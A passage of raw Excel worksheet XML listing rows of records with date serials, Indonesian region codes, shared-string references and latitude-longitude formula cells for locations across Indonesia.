      <c r="J3795" t="s">
        <v>12548</v>
      </c>
      <c r="L3795" t="s">
        <v>12549</v>
      </c>
      <c r="M3795">
        <v>3174010003</v>
      </c>
      <c r="N3795">
        <v>3174010</v>
      </c>
      <c r="O3795">
        <v>3174</v>
      </c>
      <c r="P3795">
        <v>31</v>
      </c>
      <c r="Q3795" t="s">
        <v>5732</v>
      </c>
      <c r="R3795" t="s">
        <v>69</v>
      </c>
      <c r="S3795" t="s">
        <v>32</v>
      </c>
      <c r="T3795" t="s">
        <v>33</v>
      </c>
      <c r="U3795" s="5">
        <v>10673043</v>
      </c>
      <c r="V3795" s="5" t="s">
        <v>17866</v>
      </c>
      <c r="W3795" s="5">
        <v>-621244</v>
      </c>
      <c r="X3795" t="s">
        <v>21601</v>
      </c>
      <c r="Y3795" t="str">
        <f t="shared" si="59"/>
        <v>-6.21244,106.73043</v>
      </c>
    </row>
    <row r="3796" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3796">
        <v>296383</v>
      </c>
      <c r="B3796" s="1">
        <v>44376</v>
      </c>
      <c r="C3796" s="2">
        <v>0.31135416666666665</v>
      </c>
      <c r="D3796" t="s">
        <v>22</v>
      </c>
      <c r="E3796" t="s">
        <v>23</v>
      </c>
      <c r="F3796" t="s">
        <v>12550</v>
      </c>
      <c r="G3796" t="s">
        <v>12551</v>
      </c>
      <c r="H3796" t="s">
        <v>9262</v>
      </c>
      <c r="I3796" t="s">
        <v>12552</v>
      </c>
      <c r="J3796" t="s">
        <v>2615</v>
      </c>
      <c r="L3796" t="s">
        <v>12553</v>
      </c>
      <c r="M3796">
        <v>3404170003</v>
      </c>
      <c r="N3796">
        <v>3404170</v>
      </c>
      <c r="O3796">
        <v>3404</v>
      </c>
      <c r="P3796">
        <v>34</v>
      </c>
      <c r="Q3796" t="s">
        <v>12554</v>
      </c>
      <c r="R3796" t="s">
        <v>9430</v>
      </c>
      <c r="S3796" t="s">
        <v>1855</v>
      </c>
      <c r="T3796" t="s">
        <v>1856</v>
      </c>
      <c r="U3796" s="5">
        <v>11045978</v>
      </c>
      <c r="V3796" s="5" t="s">
        <v>17867</v>
      </c>
      <c r="W3796" s="5">
        <v>-759777</v>
      </c>
      <c r="X3796" t="s">
        <v>21602</v>
      </c>
      <c r="Y3796" t="str">
        <f t="shared" si="59"/>
        <v>-7.59777,110.45978</v>
      </c>
    </row>
    <row r="3797" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3797">
        <v>296386</v>
      </c>
      <c r="B3797" s="1">
        <v>44379</v>
      </c>
      <c r="C3797" s="2">
        <v>0.39818287037037042</v>
      </c>
      <c r="D3797" t="s">
        <v>22</v>
      </c>
      <c r="E3797" t="s">
        <v>23</v>
      </c>
      <c r="F3797" t="s">
        <v>12555</v>
      </c>
      <c r="G3797" t="s">
        <v>12556</v>
      </c>
      <c r="H3797" t="s">
        <v>26</v>
      </c>
      <c r="I3797" t="s">
        <v>1862</v>
      </c>
      <c r="J3797" t="s">
        <v>7171</v>
      </c>
      <c r="L3797" t="s">
        <v>12557</v>
      </c>
      <c r="M3797">
        <v>6472040005</v>
      </c>
      <c r="N3797">
        <v>6472040</v>
      </c>
      <c r="O3797">
        <v>6472</v>
      </c>
      <c r="P3797">
        <v>64</v>
      </c>
      <c r="Q3797" t="s">
        <v>12558</v>
      </c>
      <c r="R3797" t="s">
        <v>12559</v>
      </c>
      <c r="S3797" t="s">
        <v>7175</v>
      </c>
      <c r="T3797" t="s">
        <v>1308</v>
      </c>
      <c r="U3797" s="5">
        <v>11711291</v>
      </c>
      <c r="V3797" s="5" t="s">
        <v>17868</v>
      </c>
      <c r="W3797" s="5">
        <v>-49710</v>
      </c>
      <c r="X3797" t="s">
        <v>21603</v>
      </c>
      <c r="Y3797" t="str">
        <f t="shared" si="59"/>
        <v xml:space="preserve"> -0.49710,117.11291</v>
      </c>
    </row>
    <row r="3798" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3798">
        <v>296385</v>
      </c>
      <c r="B3798" s="1">
        <v>44379</v>
      </c>
      <c r="C3798" s="2">
        <v>0.29438657407407409</v>
      </c>
      <c r="D3798" t="s">
        <v>22</v>
      </c>
      <c r="E3798" t="s">
        <v>23</v>
      </c>
      <c r="F3798" t="s">
        <v>12560</v>
      </c>
      <c r="G3798" t="s">
        <v>12561</v>
      </c>
      <c r="H3798" t="s">
        <v>26</v>
      </c>
      <c r="I3798" t="s">
        <v>2300</v>
      </c>
      <c r="J3798" t="s">
        <v>7171</v>
      </c>
      <c r="L3798" t="s">
        <v>12562</v>
      </c>
      <c r="M3798">
        <v>6472040005</v>
      </c>
      <c r="N3798">
        <v>6472040</v>
      </c>
      <c r="O3798">
        <v>6472</v>
      </c>
      <c r="P3798">
        <v>64</v>
      </c>
      <c r="Q3798" t="s">
        <v>12558</v>
      </c>
      <c r="R3798" t="s">
        <v>12559</v>
      </c>
      <c r="S3798" t="s">
        <v>7175</v>
      </c>
      <c r="T3798" t="s">
        <v>1308</v>
      </c>
      <c r="U3798" s="5">
        <v>11709627</v>
      </c>
      <c r="V3798" s="5" t="s">
        <v>17869</v>
      </c>
      <c r="W3798" s="5">
        <v>-49745</v>
      </c>
      <c r="X3798" t="s">
        <v>21604</v>
      </c>
      <c r="Y3798" t="str">
        <f t="shared" si="59"/>
        <v xml:space="preserve"> -0.49745,117.09627</v>
      </c>
    </row>
    <row r="3799" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3799">
        <v>296387</v>
      </c>
      <c r="B3799" s="1">
        <v>44382</v>
      </c>
      <c r="C3799" s="2">
        <v>0.35931712962962964</v>
      </c>
      <c r="D3799" t="s">
        <v>22</v>
      </c>
      <c r="E3799" t="s">
        <v>23</v>
      </c>
      <c r="F3799" t="s">
        <v>12563</v>
      </c>
      <c r="G3799" t="s">
        <v>12564</v>
      </c>
      <c r="H3799" t="s">
        <v>26</v>
      </c>
      <c r="I3799" t="s">
        <v>961</v>
      </c>
      <c r="J3799" t="s">
        <v>2622</v>
      </c>
      <c r="L3799" t="s">
        <v>12565</v>
      </c>
      <c r="M3799">
        <v>3510190003</v>
      </c>
      <c r="N3799">
        <v>3510190</v>
      </c>
      <c r="O3799">
        <v>3510</v>
      </c>
      <c r="P3799">
        <v>35</v>
      </c>
      <c r="Q3799" t="s">
        <v>12566</v>
      </c>
      <c r="R3799" t="s">
        <v>12567</v>
      </c>
      <c r="S3799" t="s">
        <v>8370</v>
      </c>
      <c r="T3799" t="s">
        <v>1221</v>
      </c>
      <c r="U3799" s="5">
        <v>11435070</v>
      </c>
      <c r="V3799" s="5" t="s">
        <v>17870</v>
      </c>
      <c r="W3799" s="5">
        <v>-821238</v>
      </c>
      <c r="X3799" t="s">
        <v>21605</v>
      </c>
      <c r="Y3799" t="str">
        <f t="shared" si="59"/>
        <v>-8.21238,114.35070</v>
      </c>
    </row>
    <row r="3800" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3800">
        <v>296389</v>
      </c>
      <c r="B3800" s="1">
        <v>44383</v>
      </c>
      <c r="C3800" s="2">
        <v>0.46947916666666667</v>
      </c>
      <c r="D3800" t="s">
        <v>22</v>
      </c>
      <c r="E3800" t="s">
        <v>23</v>
      </c>
      <c r="F3800" t="s">
        <v>12568</v>
      </c>
      <c r="G3800" t="s">
        <v>12569</v>
      </c>
      <c r="H3800" t="s">
        <v>26</v>
      </c>
      <c r="I3800" t="s">
        <v>166</v>
      </c>
      <c r="J3800" t="s">
        <v>6940</v>
      </c>
      <c r="L3800" t="s">
        <v>12570</v>
      </c>
      <c r="M3800">
        <v>1115030999</v>
      </c>
      <c r="N3800">
        <v>1115030</v>
      </c>
      <c r="O3800">
        <v>1115</v>
      </c>
      <c r="P3800">
        <v>11</v>
      </c>
      <c r="Q3800" t="s">
        <v>12571</v>
      </c>
      <c r="R3800" t="s">
        <v>12572</v>
      </c>
      <c r="S3800" t="s">
        <v>12573</v>
      </c>
      <c r="T3800" t="s">
        <v>6945</v>
      </c>
      <c r="U3800" s="5">
        <v>9652577</v>
      </c>
      <c r="V3800" s="5" t="s">
        <v>17871</v>
      </c>
      <c r="W3800" s="5">
        <v>418124</v>
      </c>
      <c r="X3800" t="s">
        <v>21606</v>
      </c>
      <c r="Y3800" t="str">
        <f t="shared" si="59"/>
        <v>4.18124,96.52577</v>
      </c>
    </row>
    <row r="3801" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3801">
        <v>296388</v>
      </c>
      <c r="B3801" s="1">
        <v>44383</v>
      </c>
      <c r="C3801" s="2">
        <v>0.12311342592592593</v>
      </c>
      <c r="D3801" t="s">
        <v>22</v>
      </c>
      <c r="E3801" t="s">
        <v>23</v>
      </c>
      <c r="F3801" t="s">
        <v>12574</v>
      </c>
      <c r="G3801" t="s">
        <v>12575</v>
      </c>
      <c r="H3801" t="s">
        <v>26</v>
      </c>
      <c r="I3801" t="s">
        <v>666</v>
      </c>
      <c r="J3801" t="s">
        <v>2622</v>
      </c>
      <c r="L3801" t="s">
        <v>12576</v>
      </c>
      <c r="M3801">
        <v>3510190003</v>
      </c>
      <c r="N3801">
        <v>3510190</v>
      </c>
      <c r="O3801">
        <v>3510</v>
      </c>
      <c r="P3801">
        <v>35</v>
      </c>
      <c r="Q3801" t="s">
        <v>12566</v>
      </c>
      <c r="R3801" t="s">
        <v>12567</v>
      </c>
      <c r="S3801" t="s">
        <v>8370</v>
      </c>
      <c r="T3801" t="s">
        <v>1221</v>
      </c>
      <c r="U3801" s="5">
        <v>11435070</v>
      </c>
      <c r="V3801" s="5" t="s">
        <v>17870</v>
      </c>
      <c r="W3801" s="5">
        <v>-821240</v>
      </c>
      <c r="X3801" t="s">
        <v>21607</v>
      </c>
      <c r="Y3801" t="str">
        <f t="shared" si="59"/>
        <v>-8.21240,114.35070</v>
      </c>
    </row>
    <row r="3802" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3802">
        <v>296391</v>
      </c>
      <c r="B3802" s="1">
        <v>44384</v>
      </c>
      <c r="C3802" s="2">
        <v>0.88228009259259255</v>
      </c>
      <c r="D3802" t="s">
        <v>22</v>
      </c>
      <c r="E3802" t="s">
        <v>23</v>
      </c>
      <c r="F3802" s="3" t="s">
        <v>12577</v>
      </c>
      <c r="G3802" t="s">
        <v>12578</v>
      </c>
      <c r="H3802" t="s">
        <v>26</v>
      </c>
      <c r="I3802" t="s">
        <v>3481</v>
      </c>
      <c r="J3802" t="s">
        <v>6626</v>
      </c>
      <c r="M3802">
        <v>7307070002</v>
      </c>
      <c r="N3802">
        <v>7307070</v>
      </c>
      <c r="O3802">
        <v>7307</v>
      </c>
      <c r="P3802">
        <v>73</v>
      </c>
      <c r="Q3802" t="s">
        <v>12579</v>
      </c>
      <c r="R3802" t="s">
        <v>12580</v>
      </c>
      <c r="S3802" t="s">
        <v>12581</v>
      </c>
      <c r="T3802" t="s">
        <v>6630</v>
      </c>
      <c r="U3802" s="5">
        <v>12025056</v>
      </c>
      <c r="V3802" s="5" t="s">
        <v>17872</v>
      </c>
      <c r="W3802" s="5">
        <v>-512518</v>
      </c>
      <c r="X3802" t="s">
        <v>21608</v>
      </c>
      <c r="Y3802" t="str">
        <f t="shared" si="59"/>
        <v>-5.12518,120.25056</v>
      </c>
    </row>
    <row r="3803" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3803">
        <v>296394</v>
      </c>
      <c r="B3803" s="1">
        <v>44386</v>
      </c>
      <c r="C3803" s="2">
        <v>0.20777777777777776</v>
      </c>
      <c r="D3803" t="s">
        <v>22</v>
      </c>
      <c r="E3803" t="s">
        <v>23</v>
      </c>
      <c r="F3803" t="s">
        <v>12582</v>
      </c>
      <c r="G3803" t="s">
        <v>12583</v>
      </c>
      <c r="H3803" t="s">
        <v>26</v>
      </c>
      <c r="I3803" t="s">
        <v>3668</v>
      </c>
      <c r="J3803" t="s">
        <v>7171</v>
      </c>
      <c r="L3803" t="s">
        <v>12584</v>
      </c>
      <c r="M3803">
        <v>6472060011</v>
      </c>
      <c r="N3803">
        <v>6472060</v>
      </c>
      <c r="O3803">
        <v>6472</v>
      </c>
      <c r="P3803">
        <v>64</v>
      </c>
      <c r="Q3803" t="s">
        <v>7202</v>
      </c>
      <c r="R3803" t="s">
        <v>7203</v>
      </c>
      <c r="S3803" t="s">
        <v>7175</v>
      </c>
      <c r="T3803" t="s">
        <v>1308</v>
      </c>
      <c r="U3803" s="5">
        <v>11716598</v>
      </c>
      <c r="V3803" s="5" t="s">
        <v>17873</v>
      </c>
      <c r="W3803" s="5">
        <v>-42102</v>
      </c>
      <c r="X3803" t="s">
        <v>21609</v>
      </c>
      <c r="Y3803" t="str">
        <f t="shared" si="59"/>
        <v xml:space="preserve"> -0.42102,117.16598</v>
      </c>
    </row>
    <row r="3804" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3804">
        <v>296392</v>
      </c>
      <c r="B3804" s="1">
        <v>44386</v>
      </c>
      <c r="C3804" s="2">
        <v>1.8275462962962962E-2</v>
      </c>
      <c r="D3804" t="s">
        <v>85</v>
      </c>
      <c r="E3804" t="s">
        <v>23</v>
      </c>
      <c r="F3804" t="s">
        <v>12585</v>
      </c>
      <c r="G3804" t="s">
        <v>12586</v>
      </c>
      <c r="H3804" t="s">
        <v>26</v>
      </c>
      <c r="J3804" t="s">
        <v>1371</v>
      </c>
      <c r="K3804" t="s">
        <v>12587</v>
      </c>
      <c r="L3804" t="s">
        <v>12588</v>
      </c>
      <c r="M3804">
        <v>3172060001</v>
      </c>
      <c r="N3804">
        <v>3172060</v>
      </c>
      <c r="O3804">
        <v>3172</v>
      </c>
      <c r="P3804">
        <v>31</v>
      </c>
      <c r="Q3804" t="s">
        <v>309</v>
      </c>
      <c r="R3804" t="s">
        <v>48</v>
      </c>
      <c r="S3804" t="s">
        <v>49</v>
      </c>
      <c r="T3804" t="s">
        <v>33</v>
      </c>
      <c r="U3804" s="5">
        <v>10686604</v>
      </c>
      <c r="V3804" s="5" t="s">
        <v>17874</v>
      </c>
      <c r="W3804" s="5">
        <v>-623508</v>
      </c>
      <c r="X3804" t="s">
        <v>21610</v>
      </c>
      <c r="Y3804" t="str">
        <f t="shared" si="59"/>
        <v>-6.23508,106.86604</v>
      </c>
    </row>
    <row r="3805" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3805">
        <v>296411</v>
      </c>
      <c r="B3805" s="1">
        <v>44387</v>
      </c>
      <c r="C3805" s="2">
        <v>0.62734953703703711</v>
      </c>
      <c r="D3805" t="s">
        <v>22</v>
      </c>
      <c r="E3805" t="s">
        <v>23</v>
      </c>
      <c r="F3805" t="s">
        <v>12589</v>
      </c>
      <c r="H3805" t="s">
        <v>26</v>
      </c>
      <c r="I3805" t="s">
        <v>3668</v>
      </c>
      <c r="J3805" t="s">
        <v>5423</v>
      </c>
      <c r="L3805" t="s">
        <v>12590</v>
      </c>
      <c r="M3805">
        <v>3174030006</v>
      </c>
      <c r="N3805">
        <v>3174030</v>
      </c>
      <c r="O3805">
        <v>3174</v>
      </c>
      <c r="P3805">
        <v>31</v>
      </c>
      <c r="Q3805" t="s">
        <v>2529</v>
      </c>
      <c r="R3805" t="s">
        <v>1487</v>
      </c>
      <c r="S3805" t="s">
        <v>32</v>
      </c>
      <c r="T3805" t="s">
        <v>33</v>
      </c>
      <c r="U3805" s="5">
        <v>10680747</v>
      </c>
      <c r="V3805" s="5" t="s">
        <v>17875</v>
      </c>
      <c r="W3805" s="5">
        <v>-617640</v>
      </c>
      <c r="X3805" t="s">
        <v>19153</v>
      </c>
      <c r="Y3805" t="str">
        <f t="shared" si="59"/>
        <v>-6.17640,106.80747</v>
      </c>
    </row>
    <row r="3806" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3806">
        <v>296415</v>
      </c>
      <c r="B3806" s="1">
        <v>44390</v>
      </c>
      <c r="C3806" s="2">
        <v>0.86952546296296296</v>
      </c>
      <c r="D3806" t="s">
        <v>22</v>
      </c>
      <c r="E3806" t="s">
        <v>23</v>
      </c>
      <c r="F3806" t="s">
        <v>12591</v>
      </c>
      <c r="G3806" t="s">
        <v>12592</v>
      </c>
      <c r="H3806" t="s">
        <v>26</v>
      </c>
      <c r="I3806" t="s">
        <v>6317</v>
      </c>
      <c r="J3806" t="s">
        <v>7436</v>
      </c>
      <c r="L3806" t="s">
        <v>12593</v>
      </c>
      <c r="M3806">
        <v>6171030006</v>
      </c>
      <c r="N3806">
        <v>6171030</v>
      </c>
      <c r="O3806">
        <v>6171</v>
      </c>
      <c r="P3806">
        <v>61</v>
      </c>
      <c r="Q3806" t="s">
        <v>12594</v>
      </c>
      <c r="R3806" t="s">
        <v>12595</v>
      </c>
      <c r="S3806" t="s">
        <v>7789</v>
      </c>
      <c r="T3806" t="s">
        <v>7441</v>
      </c>
      <c r="U3806" s="5">
        <v>10930459</v>
      </c>
      <c r="V3806" s="5" t="s">
        <v>17876</v>
      </c>
      <c r="W3806" s="5">
        <v>-2131</v>
      </c>
      <c r="X3806" t="s">
        <v>21611</v>
      </c>
      <c r="Y3806" t="str">
        <f t="shared" si="59"/>
        <v xml:space="preserve"> -0.02131,109.30459</v>
      </c>
    </row>
    <row r="3807" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3807">
        <v>296416</v>
      </c>
      <c r="B3807" s="1">
        <v>44391</v>
      </c>
      <c r="C3807" s="2">
        <v>0.58664351851851848</v>
      </c>
      <c r="D3807" t="s">
        <v>22</v>
      </c>
      <c r="E3807" t="s">
        <v>23</v>
      </c>
      <c r="F3807" t="s">
        <v>12596</v>
      </c>
      <c r="G3807" t="s">
        <v>12597</v>
      </c>
      <c r="H3807" t="s">
        <v>26</v>
      </c>
      <c r="I3807" t="s">
        <v>666</v>
      </c>
      <c r="J3807" t="s">
        <v>7436</v>
      </c>
      <c r="L3807" t="s">
        <v>12598</v>
      </c>
      <c r="M3807">
        <v>6111020004</v>
      </c>
      <c r="N3807">
        <v>6111020</v>
      </c>
      <c r="O3807">
        <v>6111</v>
      </c>
      <c r="P3807">
        <v>61</v>
      </c>
      <c r="Q3807" t="s">
        <v>12599</v>
      </c>
      <c r="R3807" t="s">
        <v>9403</v>
      </c>
      <c r="S3807" t="s">
        <v>12600</v>
      </c>
      <c r="T3807" t="s">
        <v>7441</v>
      </c>
      <c r="U3807" s="5">
        <v>10995936</v>
      </c>
      <c r="V3807" s="5" t="s">
        <v>17877</v>
      </c>
      <c r="W3807" s="5">
        <v>-123138</v>
      </c>
      <c r="X3807" t="s">
        <v>21612</v>
      </c>
      <c r="Y3807" t="str">
        <f t="shared" si="59"/>
        <v>-1.23138,109.95936</v>
      </c>
    </row>
    <row r="3808" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3808">
        <v>296417</v>
      </c>
      <c r="B3808" s="1">
        <v>44395</v>
      </c>
      <c r="C3808" s="2">
        <v>0.37777777777777777</v>
      </c>
      <c r="D3808" t="s">
        <v>85</v>
      </c>
      <c r="E3808" t="s">
        <v>23</v>
      </c>
      <c r="F3808" t="s">
        <v>12601</v>
      </c>
      <c r="G3808" t="s">
        <v>12602</v>
      </c>
      <c r="H3808" t="s">
        <v>26</v>
      </c>
      <c r="J3808" t="s">
        <v>1371</v>
      </c>
      <c r="K3808" t="s">
        <v>12603</v>
      </c>
      <c r="L3808" t="s">
        <v>12604</v>
      </c>
      <c r="M3808">
        <v>3172060001</v>
      </c>
      <c r="N3808">
        <v>3172060</v>
      </c>
      <c r="O3808">
        <v>3172</v>
      </c>
      <c r="P3808">
        <v>31</v>
      </c>
      <c r="Q3808" t="s">
        <v>309</v>
      </c>
      <c r="R3808" t="s">
        <v>48</v>
      </c>
      <c r="S3808" t="s">
        <v>49</v>
      </c>
      <c r="T3808" t="s">
        <v>33</v>
      </c>
      <c r="U3808" s="5">
        <v>10686628</v>
      </c>
      <c r="V3808" s="5" t="s">
        <v>17878</v>
      </c>
      <c r="W3808" s="5">
        <v>-623370</v>
      </c>
      <c r="X3808" t="s">
        <v>18982</v>
      </c>
      <c r="Y3808" t="str">
        <f t="shared" si="59"/>
        <v>-6.23370,106.86628</v>
      </c>
    </row>
    <row r="3809" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3809">
        <v>296456</v>
      </c>
      <c r="B3809" s="1">
        <v>44407</v>
      </c>
      <c r="C3809" s="2">
        <v>0.15086805555555557</v>
      </c>
      <c r="D3809" t="s">
        <v>22</v>
      </c>
      <c r="E3809" t="s">
        <v>23</v>
      </c>
      <c r="F3809" t="s">
        <v>12605</v>
      </c>
      <c r="G3809" t="s">
        <v>12606</v>
      </c>
      <c r="H3809" t="s">
        <v>8525</v>
      </c>
      <c r="I3809" t="s">
        <v>12607</v>
      </c>
      <c r="J3809" t="s">
        <v>7436</v>
      </c>
      <c r="L3809" t="s">
        <v>12608</v>
      </c>
      <c r="M3809">
        <v>6106070012</v>
      </c>
      <c r="N3809">
        <v>6106070</v>
      </c>
      <c r="O3809">
        <v>6106</v>
      </c>
      <c r="P3809">
        <v>61</v>
      </c>
      <c r="Q3809" t="s">
        <v>12609</v>
      </c>
      <c r="R3809" t="s">
        <v>12610</v>
      </c>
      <c r="S3809" t="s">
        <v>7440</v>
      </c>
      <c r="T3809" t="s">
        <v>7441</v>
      </c>
      <c r="U3809" s="5">
        <v>11005245</v>
      </c>
      <c r="V3809" s="5" t="s">
        <v>17879</v>
      </c>
      <c r="W3809" s="5">
        <v>-162361</v>
      </c>
      <c r="X3809" t="s">
        <v>21613</v>
      </c>
      <c r="Y3809" t="str">
        <f t="shared" si="59"/>
        <v>-1.62361,110.05245</v>
      </c>
    </row>
    <row r="3810" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3810">
        <v>296464</v>
      </c>
      <c r="B3810" s="1">
        <v>44408</v>
      </c>
      <c r="C3810" s="2">
        <v>0.16196759259259261</v>
      </c>
      <c r="D3810" t="s">
        <v>22</v>
      </c>
      <c r="E3810" t="s">
        <v>23</v>
      </c>
      <c r="F3810" t="s">
        <v>12611</v>
      </c>
      <c r="H3810" t="s">
        <v>26</v>
      </c>
      <c r="I3810" t="s">
        <v>1809</v>
      </c>
      <c r="J3810" t="s">
        <v>10173</v>
      </c>
      <c r="L3810" t="s">
        <v>12612</v>
      </c>
      <c r="M3810">
        <v>3172050001</v>
      </c>
      <c r="N3810">
        <v>3172050</v>
      </c>
      <c r="O3810">
        <v>3172</v>
      </c>
      <c r="P3810">
        <v>31</v>
      </c>
      <c r="Q3810" t="s">
        <v>10175</v>
      </c>
      <c r="R3810" t="s">
        <v>358</v>
      </c>
      <c r="S3810" t="s">
        <v>49</v>
      </c>
      <c r="T3810" t="s">
        <v>33</v>
      </c>
      <c r="U3810" s="5">
        <v>10684827</v>
      </c>
      <c r="V3810" s="5" t="s">
        <v>17880</v>
      </c>
      <c r="W3810" s="5">
        <v>-628645</v>
      </c>
      <c r="X3810" t="s">
        <v>21614</v>
      </c>
      <c r="Y3810" t="str">
        <f t="shared" si="59"/>
        <v>-6.28645,106.84827</v>
      </c>
    </row>
    <row r="3811" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3811">
        <v>296467</v>
      </c>
      <c r="B3811" s="1">
        <v>44408</v>
      </c>
      <c r="C3811" s="2">
        <v>0.16418981481481482</v>
      </c>
      <c r="D3811" t="s">
        <v>22</v>
      </c>
      <c r="E3811" t="s">
        <v>23</v>
      </c>
      <c r="F3811" t="s">
        <v>12613</v>
      </c>
      <c r="G3811" t="s">
        <v>12614</v>
      </c>
      <c r="H3811" t="s">
        <v>26</v>
      </c>
      <c r="I3811" t="s">
        <v>65</v>
      </c>
      <c r="J3811" t="s">
        <v>5777</v>
      </c>
      <c r="L3811" t="s">
        <v>12615</v>
      </c>
      <c r="M3811">
        <v>3172050001</v>
      </c>
      <c r="N3811">
        <v>3172050</v>
      </c>
      <c r="O3811">
        <v>3172</v>
      </c>
      <c r="P3811">
        <v>31</v>
      </c>
      <c r="Q3811" t="s">
        <v>10175</v>
      </c>
      <c r="R3811" t="s">
        <v>358</v>
      </c>
      <c r="S3811" t="s">
        <v>49</v>
      </c>
      <c r="T3811" t="s">
        <v>33</v>
      </c>
      <c r="U3811" s="5">
        <v>10685130</v>
      </c>
      <c r="V3811" s="5" t="s">
        <v>17881</v>
      </c>
      <c r="W3811" s="5">
        <v>-627383</v>
      </c>
      <c r="X3811" t="s">
        <v>21615</v>
      </c>
      <c r="Y3811" t="str">
        <f t="shared" si="59"/>
        <v>-6.27383,106.85130</v>
      </c>
    </row>
    <row r="3812" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3812">
        <v>296475</v>
      </c>
      <c r="B3812" s="1">
        <v>44408</v>
      </c>
      <c r="C3812" s="2">
        <v>0.17232638888888888</v>
      </c>
      <c r="D3812" t="s">
        <v>22</v>
      </c>
      <c r="E3812" t="s">
        <v>23</v>
      </c>
      <c r="F3812" t="s">
        <v>12616</v>
      </c>
      <c r="H3812" t="s">
        <v>26</v>
      </c>
      <c r="I3812" t="s">
        <v>1194</v>
      </c>
      <c r="J3812" t="s">
        <v>12617</v>
      </c>
      <c r="L3812" t="s">
        <v>12618</v>
      </c>
      <c r="M3812">
        <v>3172050001</v>
      </c>
      <c r="N3812">
        <v>3172050</v>
      </c>
      <c r="O3812">
        <v>3172</v>
      </c>
      <c r="P3812">
        <v>31</v>
      </c>
      <c r="Q3812" t="s">
        <v>10175</v>
      </c>
      <c r="R3812" t="s">
        <v>358</v>
      </c>
      <c r="S3812" t="s">
        <v>49</v>
      </c>
      <c r="T3812" t="s">
        <v>33</v>
      </c>
      <c r="U3812" s="5">
        <v>10684975</v>
      </c>
      <c r="V3812" s="5" t="s">
        <v>17882</v>
      </c>
      <c r="W3812" s="5">
        <v>-628047</v>
      </c>
      <c r="X3812" t="s">
        <v>19393</v>
      </c>
      <c r="Y3812" t="str">
        <f t="shared" si="59"/>
        <v>-6.28047,106.84975</v>
      </c>
    </row>
    <row r="3813" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3813">
        <v>296478</v>
      </c>
      <c r="B3813" s="1">
        <v>44408</v>
      </c>
      <c r="C3813" s="2">
        <v>0.24076388888888889</v>
      </c>
      <c r="D3813" t="s">
        <v>22</v>
      </c>
      <c r="E3813" t="s">
        <v>23</v>
      </c>
      <c r="F3813" t="s">
        <v>12619</v>
      </c>
      <c r="H3813" t="s">
        <v>26</v>
      </c>
      <c r="I3813" t="s">
        <v>882</v>
      </c>
      <c r="J3813" t="s">
        <v>12620</v>
      </c>
      <c r="L3813" t="s">
        <v>250</v>
      </c>
      <c r="M3813">
        <v>3175060002</v>
      </c>
      <c r="N3813">
        <v>3175060</v>
      </c>
      <c r="O3813">
        <v>3175</v>
      </c>
      <c r="P3813">
        <v>31</v>
      </c>
      <c r="Q3813" t="s">
        <v>2674</v>
      </c>
      <c r="R3813" t="s">
        <v>2279</v>
      </c>
      <c r="S3813" t="s">
        <v>547</v>
      </c>
      <c r="T3813" t="s">
        <v>33</v>
      </c>
      <c r="U3813" s="5">
        <v>10695800</v>
      </c>
      <c r="V3813" s="5" t="s">
        <v>17883</v>
      </c>
      <c r="W3813" s="5">
        <v>-614521</v>
      </c>
      <c r="X3813" t="s">
        <v>19186</v>
      </c>
      <c r="Y3813" t="str">
        <f t="shared" si="59"/>
        <v>-6.14521,106.95800</v>
      </c>
    </row>
    <row r="3814" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3814">
        <v>296479</v>
      </c>
      <c r="B3814" s="1">
        <v>44408</v>
      </c>
      <c r="C3814" s="2">
        <v>0.24313657407407407</v>
      </c>
      <c r="D3814" t="s">
        <v>22</v>
      </c>
      <c r="E3814" t="s">
        <v>23</v>
      </c>
      <c r="F3814" t="s">
        <v>12621</v>
      </c>
      <c r="H3814" t="s">
        <v>26</v>
      </c>
      <c r="I3814" t="s">
        <v>1542</v>
      </c>
      <c r="J3814" t="s">
        <v>12620</v>
      </c>
      <c r="L3814" t="s">
        <v>2794</v>
      </c>
      <c r="M3814">
        <v>3175060002</v>
      </c>
      <c r="N3814">
        <v>3175060</v>
      </c>
      <c r="O3814">
        <v>3175</v>
      </c>
      <c r="P3814">
        <v>31</v>
      </c>
      <c r="Q3814" t="s">
        <v>2674</v>
      </c>
      <c r="R3814" t="s">
        <v>2279</v>
      </c>
      <c r="S3814" t="s">
        <v>547</v>
      </c>
      <c r="T3814" t="s">
        <v>33</v>
      </c>
      <c r="U3814" s="5">
        <v>10695805</v>
      </c>
      <c r="V3814" s="5" t="s">
        <v>17884</v>
      </c>
      <c r="W3814" s="5">
        <v>-614544</v>
      </c>
      <c r="X3814" t="s">
        <v>21616</v>
      </c>
      <c r="Y3814" t="str">
        <f t="shared" si="59"/>
        <v>-6.14544,106.95805</v>
      </c>
    </row>
    <row r="3815" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3815">
        <v>296671</v>
      </c>
      <c r="B3815" s="1">
        <v>44436</v>
      </c>
      <c r="C3815" s="2">
        <v>0.86890046296296297</v>
      </c>
      <c r="D3815" t="s">
        <v>22</v>
      </c>
      <c r="E3815" t="s">
        <v>23</v>
      </c>
      <c r="F3815" t="s">
        <v>12622</v>
      </c>
      <c r="G3815" t="s">
        <v>12623</v>
      </c>
      <c r="H3815" t="s">
        <v>26</v>
      </c>
      <c r="I3815" t="s">
        <v>666</v>
      </c>
      <c r="J3815" t="s">
        <v>6626</v>
      </c>
      <c r="L3815" t="s">
        <v>12624</v>
      </c>
      <c r="M3815">
        <v>7313120005</v>
      </c>
      <c r="N3815">
        <v>7313120</v>
      </c>
      <c r="O3815">
        <v>7313</v>
      </c>
      <c r="P3815">
        <v>73</v>
      </c>
      <c r="Q3815" t="s">
        <v>12625</v>
      </c>
      <c r="R3815" t="s">
